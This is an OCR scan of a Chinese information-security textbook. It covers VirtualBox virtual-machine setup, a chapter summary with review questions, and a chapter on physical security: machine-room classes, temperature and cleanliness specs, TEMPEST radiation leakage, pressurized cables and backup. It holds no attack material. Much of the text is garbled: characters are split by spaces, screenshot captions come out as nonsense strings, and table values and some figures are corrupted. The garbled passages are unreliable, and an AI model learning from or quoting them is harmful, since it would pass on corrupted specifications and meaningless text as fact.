(2) 打开 “VirtualBox- 设 置 " 对 话 框 ,选择 “语言 "选项 ,如 图 1-14 所 示 。 

(3) 选择 “常规 ”选项 ,设置 虚拟 硬盘 和 虚拟 电脑 位 置 ,虚拟 电脑 中 包含 快照 配置 \ 日 志 
等 ,虚拟 硬盘 包含 硬盘 文件 ,如 图 1-15 所 示 。 


7 Oracle VM VirtualBox 


欢迎 使 用 虚拟 电脑 控制 台 ! 

窗口 的 左边 用 来 显示 已 生成 的 虚拟 电脑 ， 现 在 是 空 的 ， 因 为 你 还 没有 新 建 任何 虚拟 电脑 
要 新 建 一 个 虚拟 电脑 ， 请 控 位 于 窗口 顶部 工具 栏 上 的 新 机 
建 控 钮 


你 可 以 按 了 1 键 来 查看 帮助 ,或 访问 
ww. virtuslbox. org 查看 最 新 信息 和 新 闻 . 


图 1-13 选择 “全 局 设 定 ” 命 令 


管理 介 控制 M) 震动 () 


动 浸 


新 建 o) 设置 E) 开 


习惯 汉语 界面 的 朋 
友 可 以 选择 此 项 q 


显示 所 有 可 用 的 用 户 界面 语言 。 加 黑 的 为 当前 正在 使 用 的 语言 。 
选择 车 将 便 用 系 坑 默认 的 滞 言 - 


区 所 人 一 取 涌 | 和 助 QD 玫 | 


1-14 语言 选择 


18 


i 硬盘 文件 存放 位 置 ，GB 级 文件 ， 不 建议 


> [ [2 
eVirtualBox -设置 


常规 | 放 在 默认 的 C 盘 里 
wenmetaw: ow -|D 
PU: [Deoeme irtoaldo achines | 
VRDP 认 证 库 外 ;| 国 VRDPAuth 四 忌 
虚拟 机 配置 文件 ， 人 快照 ， 日 志 等 存放 位 置 


才 生 首 的 讼 夺 嵌 疙 放送 朝 一 个 类 别 ， 都 三 邵 动 导 庄 到 一 个 司 拓 的 
襄 导 大 司 以 黎民 画 启 售 思 


图 1-15 虚拟 硬盘 和 虚拟 电脑 位 置 
) 打开 “新 建 虚拟 电脑 "界面 ,如 图 1-16 所 示 。 


管理 全 。 控制 M) 寺 动 仙 ) 


和 [ET 
让 所。 和 星人 0 6。 | 欢迎 使 用 虚拟 电 脑 控制 台 ! 


窗口 的 左边 用 来 显示 已 生成 的 虚拟 电脑 ， 现 在 是 空 的 ， 因 为 你 还 没有 新 建 任何 虚拟 电脑 


新 建 虚拟 电脑 


欢迎 使 用 新 建 虚拟 电脑 向 导 ! 


This wizard will guide you through the steps that are necessary to create & 
new virtual machine for VirtualBox, 


Use the 下 一 步 button to go to the next page of the wizard and the 上 一 步 
button to return to the previous page, You can also press 取消 if you want 
to eancel the execution of this wizard 


上 因 习 | 一 了 一 


1-16 “新 建 虚拟 电脑 ”界面 
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(5) 设置 虚拟 电脑 名 称 和 系统 类 型 ,如 图 1-17 所 示 。 


省 过 人 久 4 = 本 [® Wn 
新 建 0 设置) 开始 (0 清除 | 欢迎 使 用 虚拟 电脑 控制 台 ! 
| | 窗口 的 左边 用 来 显示 已 生成 的 虚拟 电 粮 ， 现 在 是 空 的 ， 因 为 你 还 没有 新 建 任何 虚拟 电脑 


新 建 虚拟 电脑 Ee 途 人 


虚拟 电脑 名 称 和 系统 类 型 Pi 
为 即 格 新 建 的 吕 拟 电 六 给 入 一 个 名 称 ， 并 指定 虚拟 电脑 上 即将 安装 的 哲 作 系统 类 型 J 


每 个 虚拟 电脑 都 要 有 一 修 唯 一 识 ) 用 来 区 分 读 虚 拟 电 脑 的 硬件 配置 和 上 面 
的 系统 、 软 件 和 数据 
和 名称 (9 


点 饭 技 术 论坛 


系 纺 关 型 四 
换 作 系统 G): | 上 icroxoft Windors 
版 本 四 : [inaovs 邓 


区 十 一 步 四] 卫 = 押 全 是 一 取 的 于 


图 1-17 设置 虚拟 电脑 名 称 和 系统 类 型 


(6) 进行 虚拟 机 内 存 分 配 ,如 图 1-18 所 示 。 


EEC 


中 [© re we vw 


4 
开始 (t) 。 滞 除 6) | 欢迎 使 用 虚拟 电脑 控制 台 ! 
窗口 的 左边 用 来 显示 已 生成 的 虚拟 电脑 、 现 在 是 空 的 ， 因 为 你 还 设 有 新 建 任何 虚拟 电脑 


内 存 gt 
”| 
指定 虚拟 电脑 可 用 内 存 大 小 ， 单 位 为 : 归 py 
建议 分 配 的 内 存 大 小 是 192 WB 
内 存 大 小 中) ” 
人 = 


这 里 就 见仁见智 了 ， 根 据 大 家 实际 内 存 配置 去 自 定义 了 ， 
内 存 大 的 用 户 可 以 多 分 配点 给 虚拟 机 ， 建 议 至 少 256M 吧 ， 
这 样 跑 XP 不 会 很 纠结 


[十 一 步 如 | 下 一 步 好 > 一 职 消 一 | 


1-18 虚拟 机 内 存 分 配 
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(7) 创建 虚拟 硬盘 ,如 图 1-19 所 示 。 


名 rE w | 


欢迎 使 用 虚拟 电脑 控制 台 ! 
窗口 的 左边 用 来 显示 已 生成 的 虚拟 电 驳 ， 现 在 是 空 的 ， 因 为 你 还 没有 新 建 任何 虚拟 电脑 


开始 (t) ”清除 (i) 


i 一 ld 


”新 建 虚 执 电 脑 


虚拟 硬盘 


选择 一 个 虚拟 硬盘 作为 虚拟 电脑 的 主 硬盘 。 你 即 可 以 单 击 新 建 按钮 建立 一 个 新 的 虚拟 
和 ， Fe 或 者 单 击 现 有 控 诸 打开 虚拟 
T 质 管理 器 


oe ， 也 可 以 坡 略 这 步 ， 以 后 再 在 虚拟 电驴 设置 对 话 框 
上 
建议 分 配 的 虚拟 硬盘 大 小 是 : 10240 有 

Bt Nr 
回 创 当 新 的 虚拟 硬盘 忆 ) 
旧 使 用 现 有 的 虚拟 硬盘 QD 
设 有 盘 片 


Eb EE mR 


图 1-19 创建 虚拟 硬盘 
(8) 打开 “创建 新 的 虚拟 硬盘 ”界面 ,如 图 1-20 所 示 。 


> nm Pe vw 二 
道人 半 仿 » . 


新 建 0) 设置) 开始 (0 。 清除 G) 欢迎 使 用 虚拟 电脑 控制 台 ! 
] | 宣 品 的 左边 用 来 显示 已 生成 的 虚拟 电脑 ， 现 在 是 空 的 ， 因 为 你 还 没有 新 建 任何 虚拟 电脑 


欢迎 使 用 新 建 虚拟 硬盘 向 导 ! 


This wizard will help you to create a new virtusl hard disk for your 
virtual nachine 


Vse the 下 一 步 button to go to the next page of the wirard and the 上 一 步 
button to return to the previous page You can 4lso press 了 油 if you want 
to cancel the execution of this wizard 


1-20 “创建 新 的 虚拟 硬盘 "界面 


己 | 回 | 吕 


> “二 Do 加 Wi | WW | 


开始 (0) 。 清除 G) 欢迎 使 用 虚拟 电脑 控制 台 ! 
窗口 的 左边 用 来 显示 已 生成 的 虚拟 电脑 ， 现 在 是 空 的 ， 因 为 你 还 没有 新 建 任何 虚拟 电脑 


创建 新 的 虚拟 衣 盘 二 | <S 


虚拟 硬盘 类 型 
过 择 休 要 新 建 的 虚 扣 硬盘 英 型 


其 中 动态 扩展 类 型 最 初 只 希 占 用 非常 小 的 物理 硬 委 富 间 。 然 后 不 断 增加 ( 录 大 到 当 | 把 
前 指定 的 大 小 )， 具体 大 小 根 需 虚 拟 电 脑 的 实际 需求 动态 分 本 


中 固定 大 小 类 型 一 中 建立 就 需 分 配 指定 大 小 的 物理 磁盘 宝 间 结 该 虚拟 硬盘 使 用 ， 
A 建立 这 种 类 型 的 虚拟 硬盘 希 花 改 较 多 的 时 间 


Storage Type 
日 本 于 于 硬 | 根据 用 户 的 不 同 需求 自行 选择 
目 固定 大 小 四 “默认 值 


图 1-21 设置 虚拟 硬盘 类 型 


(10) 设置 虚拟 硬盘 的 位 置 和 大 小 ,如 图 1-22 所 示 。 
(11) 完成 软件 配置 。 


与 | 加 | 电 


[ ET EEC 


新建 m) 设置) ”开始 (0) ”和 滞 除 6G) ”| 欢迎 使 用 虚拟 电脑 控制 台 ! 
窗口 的 左边 用 来 显示 已 生成 的 虚拟 电脑 ， 现 在 是 空 的 ， 因 为 你 还 没有 新 建 任何 虚拟 电脑 


创建 新 的 虚拟 硬盘 


虚拟 硬盘 所 在 位 置 和 空间 大 小 

革 寺 过 择 近亲 用 条 指定 保存 虞 失 大 入 的 文件 及 下 位 置 ， 于 者 也 可 直接 在 输入 框 中 办 
ns 硬盘 文件 存放 位 置 
点 饭 技术 论坛 加 


以 二 由 为 单位 指定 要 新 建 的 虚 扳 硬盘 大 小 
加 
一 


4.00 眶 


本 
指定 的 虚拟 磁盘 划分 大 小 ， 默 认 是 10G 


《< 士 一 步 如 | 下 一 步 > [一 取 宵 一 


图 1-22 设置 虚拟 硬盘 的 位 置 和 大 小 
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本 章 小 结 


(1) 信息 安全 基本 概念 包括 信息 安全 的 含义 、 信 息 安 全 的 重要 性 及 信息 安全 的 作用 和 
地 位 3 个 方面 的 内 容 。 我 国 国民 经 济 和 社会 信息 化 建设 进程 全 面 加 快 ,信息 安全 在 保障 经 
济 发 展 , 社 会 稳定 、 国 家 安全 .公众 权益 中 的 作用 和 地 位 日 显 重要 。 

(2) 信息 安全 环境 及 现状 包括 信息 安全 的 威胁 信息 安全 的 研究 内 容 、 信 息 安全 的 目标 
及 网 络 安全 技术 趋势 4 个 方面 。 信 息 安全 的 研究 内 容 非 常 广泛 ,涉及 网 络 信息 的 完整 性 、 保 
密 性 、 真 实 性 、 可 用 性 、 占 有 性 和 可 控 性 的 相关 技术 和 理论 。 

(3) 引起 网 络 不 安全 的 原因 有 内 因 和 外 因 之 分 。 内 因 是 指 网 络 和 系统 的 自身 缺陷 与 脆 
弱 性 ,外因 是 指 国家 政治 .商业 和 个 人 的 利益 冲突 。 归 纳 起 来 ,导致 网 络 不 安全 的 根本 原因 
是 系统 漏洞 .协议 的 开放 性 和 人 为 因素 。 网 络 的 管理 制度 和 相关 法 律 法 规 的 不 完善 也 是 导 
致 网 络 不 安全 的 重要 因素 。 
(4) 信息 安全 体系 结构 包括 OSI 安全 体系 结构 、TCP/1IP 安全 架构 、 信 息 安 全 保障 体系 
及 网 络 信息 安全 系统 设计 原则 4 个 方面 。 网 络 信息 安全 系统 在 设计 过 程 中 应 该 遵循 9 项 原 
则 : 木 桶 原则 ,整体 性 原则 ,安全 性 评价 与 平衡 原则 ,标准 化 与 一 致 性 原则 ,技术 与 管理 相 结 
原则 ,统筹 规划 、 分 步 实施 原则 ,等 级 性 原则 ,动态 发 展 原则 及 易 操 作 性 原则 。 


落 


思 考题 


. 信息 安全 的 重要 性 体现 在 哪 几 个 方面 ? 

. 信息 安全 面临 哪些 威胁 ? 

. 分 析 计 算 机 网 络 安全 技术 的 发 展 趋势 。 

. 为 什么 要 研究 信息 安全 ? 

. 信息 安全 研究 哪些 方面 的 内 容 ? 

. 信息 安全 问题 分 为 哪 几 个 层次 ? 

. 网 络 信息 安全 系统 在 设计 过 程 中 应 遵循 哪些 原则 ? 
.信息 安全 的 目标 是 什么 ? 


[i 虽 辐 上 oo 
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物理 安全 也 称 为 实体 安全 ,是 指 为 了 保证 计算 机 系统 安全 、 可 靠 地 运行 ,确保 系统 在 对 
信息 进行 采集 ,传输 ,存储 ,处 理 、 显 示 、 分 发 和 利用 的 过 程 中 ,不 会 受到 人 为 或 自然 因素 的 危 
害 而 使 信息 丢失 ,泄露 和 破坏 ,对 计算 机 系统 设备 、 通 信 与 网 络 设 备 , 存 储 媒体 设备 和 人 员 所 
采取 的 安全 技术 措施 。 物 理 安全 主要 考虑 的 问题 是 环境 \ 场 地 和 设备 的 安全 ,以 及 物理 访问 
控制 和 应 急 处 置 计划 等 , 它 在 整个 计算 机 网 络 信息 系统 安全 中 占有 重要 地 位 ,主要 包括 环境 
安全 ,设备 安全 和 媒体 安全 3 个 方面 。 


2.1 环境 安全 


环境 安全 是 指 对 系统 所 处 环境 的 安全 保护 ,如 设备 的 运行 环境 需要 适当 的 温度 、 湿 度 ， 
尽量 少 的 烟尘 ,不 间断 电源 保障 等 。 计 算 机 系统 硬件 由 电子 设备 ,机 电 设备 和 光 磁 材料 组 
成 ,这 些 设备 的 可 靠 性 和 安全 性 与 环境 条 件 有 着 密切 的 关系 。 如 果 环 境 条 件 不 能 满足 设备 
对 环境 的 使 用 要 求 ,物理 设备 的 可 靠 性 和 安全 性 就 会 降低 , 轻 则 造成 数据 或 程序 出 错 、 破 坏 ， 
重 则 加 速 元 器 件 老化 ,缩短 机 器 寿命 ,或 者 发 生 故障 使 系统 不 能 正常 运行 ,严重 时 还 会 危害 
设备 和 人 员 的 安全 。 环 境 安全 技术 是 指 确保 物理 设备 安全 、 可 靠 运行 的 技术 、 要 求 、 措 施 和 
规范 的 总 和 ,主要 包括 机 房 安 全 设计 和 机 房 环境 安全 措施 。 


2.1.1 机 房 安全 设计 


计算 机 系统 中 的 各 种 数据 按 其 重要 性 等 级 ,需要 提供 不 同 级 别 的 保护 。 如 果 对 高 等 级 
数据 采取 低 水 平 的 保护 ,就 会 造成 不 应 有 的 损失 ; 相反 ,如 果 对 低 等 级 的 数据 提供 高 水 平 的 
保护 ,又 会 造成 不 应 有 的 浪费 。 因 此 ,应 根据 计算 机 机 房管 理 数据 的 重要 程度 规定 不 同 的 安 
全 等 级 。 

1. 机 房 安全 等 级 

机 房 的 安全 等 级 分 为 A 类 、B 类 和 C 类 3 个 基本 类 别 。 其 中 .A 类 对 计算 机 机 房 的 安 
全 有 严格 的 要 求 , 有 完善 的 计算 机 机 房 安全 措施 ; B 类 对 计算 机 机 房 的 安全 有 较 严 格 的 要 
求 ,有 和 较 完善 的 计算 机 机 房 安 全 措施 ; C 类 对 计算 机 机 房 的 安全 有 基本 的 要 求 ,有 基本 的 计 
算 机 机 房 安 全 措施 。 

各 等 级 划分 情况 如 表 2-1 所 示 。 

2. 机 房 面 积 要 求 

机 房 面积 的 大 小 与 需要 安装 的 设备 有 关 , 另 外 还 要 考虑 人 在 其 中 工作 是 否 舒适 。 通 常 
机 房 面 各 有 以 下 两 种 估算 方法 。 
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表 2-1 计算 机 机 房 安 全 要 求 
安全 项 目 A 级 机 房 B 级 机 房 C 级 机 房 
场地 选择 二 = 
防火 和 = = 二 
内 部 装修 二 
供 配 电 系统 二 和 二 
空调 系统 村 二 
火灾 报警 及 消防 设施 法 - 3 
防水 + 
防 静电 十 一 
十 
十 


防 雷击 

防 鼠 害 

防 电磁 泄露 = 2 
注 : 十 表示 要 求 ; 一 表示 有 要 求 或 增加 要 求 。 


(1) 按 机 房 内 设备 总 面积 M 计算 。 计 算 公 式 为 : 
机 房 面 积 = (5 一 7)MCm2?) 

这 里 的 设备 面积 是 指 设备 的 最 大 外 形 尺 寸 , 应 把 所 有 的 设备 都 包括 在 内 ,如 所 有 的 计算 
机 、 网 络 设备 I/O 设备 、 电 源 设备 资料 柜 、 耗 材 柜 、 空 调 设备 等 。 系 数 5 一 7 是 根据 我 国 现 
有 机 房 的 实际 使 用 面积 与 设备 所 占 面积 之 间 关 系 的 统计 数据 确定 的 ,实际 应 用 时 要 受到 本 
单位 具体 情况 的 限制 。 

(2) 根据 机 房 内 设备 的 总 数 进行 机 房 面 积 的 估算 。 假 设 设备 的 总 和 数 为 氏 , 则 估算 公 
式 为 ， 

机 房 面 积 一 (4.5 一 5.5)KCm2) 

在 这 种 计算 方法 中 ,估算 的 准确 与 否 与 各 种 设备 的 尺寸 是 否 大 致 相同 有 密切 关系 ,一 般 
的 参考 标准 是 按 台 式 计算 机 的 尺寸 为 一 台 设备 进行 估算 。 如 果 一 台 设 备 占 地 面积 太 大 ,最 
好 将 它 按 两 台 或 多 台 台 式 计算 机 来 计算 ,这 样 可 能 会 更 准确 。 系 数 4. 5 一 5. 5 也 是 根据 我 国 
具体 情况 的 统计 数据 确定 的 。 

3. 机 房 干扰 防护 要 求 

计算 机 系统 实体 是 由 电子 设备 ,机电 设备 和 光 磁 材料 组 成 的 复杂 系统 , 较 易 受 到 环境 的 


干扰 。 因 此 ,机 房 设计 需要 减少 各 种 干扰 。 干扰 的 来 源 主要 有 4 个 方面 : 噪声 干扰 ,电气 干 
扰 、 电 磁 干 扰 和 气候 干扰 。 

一 般 而 言 , 微 机 房 内 的 噪声 应 小 于 65dB。 防 止 电气 干 扰 的 根本 办 法 是 采用 稳定 、 可 靠 
的 电源 ,并 加 滤波 和 隔离 措施 。 在 设计 和 建造 机 房 时 ,必须 考虑 到 振动 和 冲击 的 影响 ,如 机 
房 附近 应 尽量 避免 振 源 、 冲 击 源 , 当 存在 一 些 振动 较 强 的 设备 时 ,如 大 型 锻压 设备 和 冲床 ,应 
采取 减 振 措 施 。 抑 制 电磁 干扰 的 方法 有 两 种 : 一 是 采用 屏蔽 技术 ; 二 是 采用 接地 技术 。 减 
少 气候 干扰 的 措施 主要 是 保持 合适 的 温度 ,湿度 和 洁净 度 , 以 满足 设备 的 最 佳 运行 状态 的 要 
求 。 机 房 的 温度 一 般 应 控制 为 21C 填 3'C ,湿度 保持 为 40%% 一 60%。 机 房 的 洁净 度 指 标 如 
表 2-2 所 示 。 洁 净 度 主要 是 指 悬 浮 在 空气 中 的 灰尘 与 有 害 气体 的 含量 ,灰尘 的 直径 一 般 为 
0.25~60pm。, 
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表 2-2 机 房 洁净 度 指标 


洁净 度 洁净 度 气流 速度 或 换 gt 2 

等 级 | 之 shm | 气 次 数 /( 次 /种 ) 正 压 值 /Pa 温度 /C 相对 湿度 | 噪声 /dB 
3 3 = >0.25 对 其 他 畏 

30 30 0.23 50~80 助 房 间 保 

300 300 6.3 20~40 持 之 5Pa; 18 一 24 |40%~60% <65 
3000 3000 23 10~20 对 室外 保 

30 000 30 000 230 10 持 之 10Pa 


同时 ,需要 制定 合理 的 清洁 卫生 制度 ,禁止 在 机 房 内 吸烟 、 吃 东西 . 乱 扔 果皮 纸 悄 等 。 
机 房 内 严禁 存放 腐蚀 物质 ,以 防 计算 机 设备 受 大 气 腐蚀 、 电 化 腐蚀 ,或 者 直接 被 氧化 、 腐 
仲 、 生 锈 及 损坏 。 在 机 房 内 要 禁止 放 食物 ,以 防老 鼠 或 其 他 昆虫 损坏 电源 线 、 记 录 介 质 及 
设备 。 


2.1.2 机 房 环 境 安全 要 求 


1. 机 房 的 外 部 环境 安全 要 求 

机 房 场地 的 选择 应 以 能 否 保证 计算 机 长 期 稳定 、 可 靠 、 安 全 的 工作 为 主要 目标 。 在 外 部 
环境 的 选择 上 ,应 考虑 环境 安全 性 、 地 质 可 靠 性 、 场 地 抗 电磁 干扰 性 ,应 避 开 强 振动 源 和 强 品 
声 源 ,避免 设 在 建筑 物 的 高 层 及 用 水 设备 的 下 层 或 隔壁 。 同 时 ,应 尽量 选择 电力 ,水 源 充 足 ， 
环境 清洁 ,交通 和 通信 方便 的 地 方 。 对 于 机 要 部 门 信息 系统 的 机 房 ,还 应 考虑 机 房 中 的 信息 
射频 不 易 被 泄露 和 窃取 。 为 了 防止 计算 机 硬件 辐射 造成 信息 泄露 ,机 房 最 好 建设 在 单位 的 
中 央 区 域 。 

2. 机 房 的 内 部 环境 安全 要 求 

(1) 机 房 应 为 专用 和 独立 的 房间 。 

(2) 经 常 使 用 的 进出 口 应 限于 一 处 ,以 便于 出 入 管理 。 

(3) 机 房 内 应 留 有 必要 的 空间 ,其 目的 是 确保 灾害 发 生 时 人 员 和 设备 的 撤离 与 维护 。 

(4) 机 房 应 设 在 建筑 物 的 最 内 层 , 而 辅助 区 、 工 作 区 和 办 公用 房 应 设 在 其 外 围 。 

(5) 机 房 上 锁 ,废物 箱 、 碎 纸 机 、 输 出 机 上 锁 , 安 装 报警 系统 与 监控 系统 。 


2.2 设备 安全 


广义 的 设备 安全 包括 物理 设备 的 防盗 ,防止 自然 灾害 或 设备 本 身 原因 导致 的 毁坏 ， 
防止 电磁 信息 辐射 导致 的 信息 泄露 ,防止 线路 截获 导致 的 信息 毁坏 和 算 改 , 抗 电磁 干扰 
和 电源 保护 等 措施 。 狭 义 的 设备 安全 是 指 用 物理 手段 保障 计算 机 系统 或 网 络 系统 安全 
的 各 种 技术 。 


2.2.1 硬件 设备 的 维护 和 管理 
计算 机 网 络 系统 的 硬件 设备 一 般 价格 昂贵 ,一 旦 被 损坏 而 又 不 能 及 时 修复 时 ,可 能 会 产 
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生 严 重 的 后 果 。 因 此 ,必须 加 强 对 计算 机 网 络 系统 硬件 设备 的 使 用 管理 ,坚持 做 好 硬件 设备 
的 日 常 维护 和 保养 工作 。 

1. 硬件 设备 的 使 用 管理 

严格 按 硬件 设备 的 操作 使 用 规程 进行 操作 ; 建立 设备 使 用 情况 日 志 , 并 登记 使 用 过 程 ; 
建立 硬件 设备 故障 情况 登记 表 ; 坚持 对 设备 进行 例 行 维护 和 保养 ,并 指定 专人 负责 

2. 常用 硬件 设备 的 维护 和 保养 

常用 硬件 设备 的 维护 和 保养 包括 主机 、 显 示 器 、 打 印 机 、 硬 盘 的 维护 保养 ; 网 络 设 备 如 
HUB.、 交 换 机 、 路 由 器 、MODEM、RJ45 接头 网络 线 缆 等 的 维护 保养 ; 还 要 定期 检查 供电 系 
统 的 各 种 保护 装置 及 地 线 是 否 正 常 。 


2.2.2 硬件 防 辐射 技术 


俗话 说 “ 明 枪 易 躲 , 暗 箭 难 防 ”, 用 来 形容 人 们 在 考虑 问题 时 常常 会 对 某 些 可 能 发 生 的 问 
题 估计 不 到 ,缺少 防范 心理 。 在 考虑 计算 机 信息 安全 问题 时 ,往往 也 会 出 现 这 种 情况 。 例 
如 ,一些 用 户 常常 仅 会 注意 计算 机 内 存 、 硬 盘 、 软 盘 上 的 信息 泄露 问题 ,而 忽视 了 计算 机 通过 
电磁 辐射 产生 的 信息 泄露 。 一 般 把 前 一 类 信息 泄露 称 为 信息 的 “ 明 ” 泄 露 ,后 一 类 信息 泄露 
称 为 信息 的 “ 暗 ?泄露 。 

实验 表明 ,普通 计算 机 显示 器 辆 射 的 屏幕 信息 可 以 在 几 百 米 到 一 千 多 米 的 范围 内 用 测 
试 设备 清楚 地 再 现 出 来 。 实 际 上 ,计算 机 的 CPU 芯片 键盘、 磁盘 驱动 器 和 打印 机 在 运行 
过 程 中 都 会 向 外 辐射 信息 。 要 防止 硬件 向 外 辐射 信息 ,必须 了 解 计算 机 各 个 部 件 信 息 泄露 
的 原因 和 程度 ,然后 采取 相应 的 防护 措施 。 

1. 计算 机 设备 的 一 些 防 泄露 措施 

对 计算 机 与 外 部 设备 究竟 要 采取 哪些 防 泄露 措施 ,要 根据 计算 机 中 信息 的 重要 程度 而 
定 。 对 于 企业 而 言 ,需要 考虑 这 些 信息 的 经 济 效益 ; 对 于 军队 而 言 , 需 要 考虑 这 些 信息 的 保 
密级 别 。 在 选择 保密 措施 时 ,不 应 该 花费 100 万 元 去 保护 价值 10 万 元 的 信息 。 下 面 是 一 些 
常用 的 防 泄露 措施 。 

(1) 整体 屏蔽 。 对 于 需要 高 度 保密 的 信息 ,如 军事 部 门 政府 机 关 和 驻 外 使 馆 的 信息 网 
络 , 应 该 将 信息 网 络 的 机 房 整体 屏蔽 起 来 。 具 体 的 方法 是 采用 金属 网 把 整个 房间 屏蔽 起 来 ， 
为 了 保证 良好 的 屏蔽 效果 ,金属 网 接地 要 良好 ,要 经 过 严格 的 测试 验收 。 整 个 房间 屏蔽 的 费 
用 比较 高 ,如 果 用 户 承担 不 起 ,可 以 采用 设备 屏蔽 的 方法 ,把 需要 屏蔽 的 计算 机 和 外 部 设备 
放 在 体积 较 小 的 屏蔽 箱 内 ,该 屏蔽 箱 接地 要 良好 。 对 于 从 屏蔽 箱 内 引出 的 导线 也 要 套 上 人 金 
属 屏蔽 网 。 

(2) 距离 防护 。 让 机 房 远 离 可 能 被 侦 测 的 地 点 ,这 是 因为 计算 机 辐射 的 距离 有 一 定 限 
制 。 对 于 一 个 单位 而 言 , 机 房 应 尽量 建 在 单位 辖区 的 中 央 地 区 。 若 一 个 单位 辖区 的 半径 少 
于 300m, 距 离 防护 的 效果 就 很 有 限 。 

(3) 使 用 干扰 器 。 在 计算 机 旁边 放置 一 个 辐射 干扰 器 ,不 断 地 向 外 辐射 干扰 电磁 波 , 该 
电磁 波 可 以 扰乱 计算 机 发 出 的 信息 电磁 波 , 使 远 处 侦 测 设备 无 法 还 原 计算 机 信和 号。 挑选 干 
扰 器 时 要 注意 干扰 器 的 带宽 是 否 与 计算 机 的 辐射 带宽 相近 ,否则 起 不 到 干扰 作用 ,这 需要 通 
过 测试 验证 。 
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(4) 利用 铁 氧 体 磁 环 。 在 屏蔽 的 电缆 线 两 端 套 上 铁 氧 体 磁 环 可 以 进一步 减少 电缆 的 辐 
射 强度 。 

2. TEMPEST 标准 

防 信息 辐射 泄露 技术 (Transient Electro Magnetic Pulse Emanations Standard 
Technology, TEMPEST) 主 要 研究 与 解决 计算 机 和 外 部 设备 工作 时 因 电 磁 辐 射 和 传导 产生 
的 信息 外 漏 问 题 。 为 了 评估 计算 机 设备 辐射 泄露 的 严重 程度 ,评价 TEMPEST 设备 的 性 能 
好 坏 ,制定 相应 的 评估 标准 是 必要 的 。TEMPEST 标准 中 一 般 包 含 规定 计算 机 设备 电磁 泄 
露 的 极限 和 规定 对 辐射 泄露 的 方法 与 设备 。TEMPEST 技术 研究 内 容 主 要 有 以 下 几 方 面 。 

(1) 电磁 泄露 机 制 : 有 用 信息 是 通过 何 种 途径 、 以 何 种 方式 载荷 到 辐射 信号 上 去 的 ,以 
及 信息 处 理 设备 的 电气 特性 和 物理 结构 对 泄露 的 影响 等 。 

(2) 信息 辐射 泄露 的 防护 技术 : 电器 元 件 . 电 路 的 布局 .设备 结构 . 连 线 和 接地 对 辐射 
泄露 的 影响 ,以 及 各 种 屏蔽 材料 .屏蔽 结构 的 屏蔽 效果 等 。 

(3) 有 用 信息 的 提取 技术 : 包括 信号 接收 和 还 原 技术 。 

(4) 测试 技术 和 标准 : 测试 的 内 容 、 方 法 、 要 求 、 条 件 、 仪 器 及 结果 分 析 , 制 定 测试 标准 。 


2.2.3 通信 线路 安全 技术 


如 果 所 有 的 系统 都 固定 在 一 个 封闭 的 环境 中 ,而 且 所 有 连接 到 系统 的 网 络 和 连接 到 系 
统 的 终端 都 在 这 个 封闭 的 环境 中 ,那么 该 通信 线路 是 安全 的 。 但 是 ,通信 网 络 业 的 快速 发 展 
使 得 上 述 假设 无 法 成 为 现实 。 因 此 , 当 系 统 的 通信 线路 暴露 在 这 个 封闭 的 环境 外 时 ,问题 便 
会 随 之 而 来 。 虽 然 从 网 络 通信 线路 上 提取 信息 所 需要 的 技术 比 从 终端 通信 线路 获取 数据 的 
技术 要 高 出 几 个 数量 级 ,但 这 种 威胁 始终 是 存在 的 ,而 且 这 样 的 问题 还 会 发 生 在 网 络 的 连接 
设备 上 。 

用 一 种 简单 但 很 昂贵 的 新 技术 给 电缆 加 压 , 可 以 获得 通信 的 物理 安全 ,这 一 技术 是 为 美 
国电 话 的 安全 而 开发 的 。 将 通信 电缆 密封 在 塑料 中 , 深 埋 于 地 下 ,并 在 线 的 两 端 加 压 。 线 上 
连接 了 带 有 报警 器 的 显示 器 ,用 来 测量 压力 。 如 果 压 力 下 降 , 则 意味 着 电缆 可 能 被 破坏 , 维 
修 人 员 将 被 派 去 维修 出 现 问题 的 电费。 

电缆 加 压 技术 提供 了 安全 的 通信 线路 。 不 是 将 电缆 埋 于 地 下 ,而 是 架 线 于 整 座 楼 中 ,每 
寸 电 缆 都 暴露 在 外 。 如 果 任 何人 企图 割 电缆 ,监视 器 会 自动 报警 ,通知 安全 保卫 人 员 电 缆 有 
可 能 被 破坏 。 如 果 有 人 成 功 地 在 电缆 上 接 上 了 自己 的 通信 设备 , 当 安 全 人 员 定 期 检查 电缆 
的 总 长 度 时 ,就 会 发 现 电 缆 的 拼接 处 。 加 压 电缆 是 屏蔽 在 波纹 铝 钢 包 皮 中 的 ,因此 几乎 没有 
电磁 辐射 ,如 果 要 用 电磁 感应 窃 密 ,势必 会 动用 大 量 可 见 的 设备 ,因此 很 容易 被 发 现 。 

光纤 通信 线 曾 被 认为 是 不 可 搭 线 窃 听 的 ,因为 其 断 询 或 破坏 处 会 立即 被 检测 到 ,拼接 处 
的 传输 会 缓慢 得 令 人 难以 忍受 。 光 纤 没 有 电磁 辐射 ,所 以 也 不 可 能 有 电磁 感应 窃 密 , 但 光纤 
的 最 大 长 度 是 有 限制 的 ,超过 一 定 长 度 的 光纤 系统 必须 对 信号 加 以 放大 ,这 就 需要 将 信号 转 
换 为 电 脉冲 ,然后 再 恢复 为 光 脉 冲 , 继 续 通 过 光纤 传送 。 完 成 这 一 操作 的 设备 (复制 器 ) 是 光 
纤 通 信 系统 安全 的 薄弱 环节 ,因为 信号 可 能 在 这 一 环节 被 搭 线 窃听 。 有 两 个 办 法 可 以 解决 
这 个 问题 : 在 距离 大 于 最 大 长 度 限 制 的 系统 间 , 不 要 用 光纤 通信 (目前 ,网 络 覆 盖 范 围 半径 
约 为 100km); 加 强 复制 器 的 安全 (如 用 加 压 电缆 ,警卫 、 报 警 系 统 等 )。 
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2.3 媒体 安全 


媒体 安全 主要 包括 媒体 数据 的 安全 及 媒体 本 身 的 安全 ,如 预防 删除 文件 ,格式 化 硬盘 、 
线路 拆除 .意外 政 漏 等 操作 失误 导致 的 安全 威胁 。 数 据 备份 是 实现 媒体 安全 的 主要 技术 。 


2.3.1 数据 备份 


1. 数据 备份 的 概念 

数据 备份 是 把 文件 或 数据 库 从 原来 存储 的 地 方 复 制 到 其 他 地 方 的 操作 ,其 目的 是 在 设 
备 发 生 故障 或 发 生 其 他 威胁 数据 安全 的 灾害 时 保护 数据 ,将 数据 遭受 破坏 的 程度 减 到 最 小 。 
数据 备份 通常 是 那些 拥有 大 型 机 的 大 企业 的 日 常事 务 之 一 ,也 是 中 小 型 企业 系统 管理 员 每 
天 必 做 的 工作 之 一 。 对 于 个 人 计算 机 用 户 ,数据 备份 也 是 非常 必要 的 ,只 不 过 通常 都 被 人 们 
